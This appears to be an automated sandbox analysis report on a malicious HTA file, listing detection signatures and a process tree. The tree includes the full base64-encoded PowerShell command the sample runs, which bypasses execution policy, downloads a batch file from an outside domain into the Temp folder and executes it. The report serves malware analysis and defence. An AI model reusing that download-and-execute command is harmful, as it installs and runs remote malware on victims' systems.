Edit tour
Windows
Analysis Report
c2.hta
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- mshta.exe (PID: 6980 cmdline:
mshta.exe "C:\Users\ user\Deskt op\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 5064 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -NoPro file -Enco dedCommand WwBOAGUAd AAuAFMAZQB yAHYAaQBjA GUAUABvAGk AbgB0AE0AY QBuAGEAZwB lAHIAXQA6A DoAUwBlAGM AdQByAGkAd AB5AFAAcgB vAHQAbwBjA G8AbAAgAD0 AIABbAE4AZ QB0AC4AUwB lAGMAdQByA GkAdAB5AFA AcgBvAHQAb wBjAG8AbAB UAHkAcABlA F0AOgA6AFQ AbABzADEAM gA7AA0ACgB oAHQAdABwA HMAOgAvAC8 AYwBhAG4AZ AB3AGYAYQB yAG0AcwBsA GwAYwAuAGM AbwBtAC8AY wAyAC4AYgB hAHQAPQAnA GgAdAB0AHA AcwA6AC8AL wBjAGEAbgB kAHcAZgBhA HIAbQBzAGw AbABjAC4AY wBvAG0ALwB jADIALgBiA GEAdAAnADs ADQAKAEMAO gBcAFUAcwB lAHIAcwBcA GEAcwBhAG8 AbABcAEEAc ABwAEQAYQB 0AGEAXABMA G8AYwBhAGw AXABUAGUAb QBwAFwAYwA yAC4AYgBhA HQAPQBDADo AXABVAHMAZ QByAHMAXAB hAHMAYQBvA GwAXABBAHA AcABEAGEAd ABhAFwATAB vAGMAYQBsA FwAVABlAG0 AcAAgACsAI AAnAFwAYwA yAC4AYgBhA HQAJwA7AA0 ACgBJAG4Ad gBvAGsAZQA tAFcAZQBiA FIAZQBxAHU AZQBzAHQAI AAtAFUAcgB pACAAaAB0A HQAcABzADo ALwAvAGMAY QBuAGQAdwB mAGEAcgBtA HMAbABsAGM ALgBjAG8Ab QAvAGMAMgA uAGIAYQB0A CAALQBPAHU AdABGAGkAb ABlACAAQwA 6AFwAVQBzA GUAcgBzAFw AYQBzAGEAb wBsAFwAQQB wAHAARABhA HQAYQBcAEw AbwBjAGEAb ABcAFQAZQB tAHAAXABjA DIALgBiAGE AdAA7AA0AC gBTAHQAYQB yAHQALQBQA HIAbwBjAGU AcwBzACAAL QBGAGkAbAB lAFAAYQB0A GgAIABDADo AXABVAHMAZ QByAHMAXAB hAHMAYQBvA GwAXABBAHA AcABEAGEAd ABhAFwATAB vAGMAYQBsA FwAVABlAG0 AcABcAGMAM gAuAGIAYQB 0ACAALQBOA G8ATgBlAHc AVwBpAG4AZ ABvAHcA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 180 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: |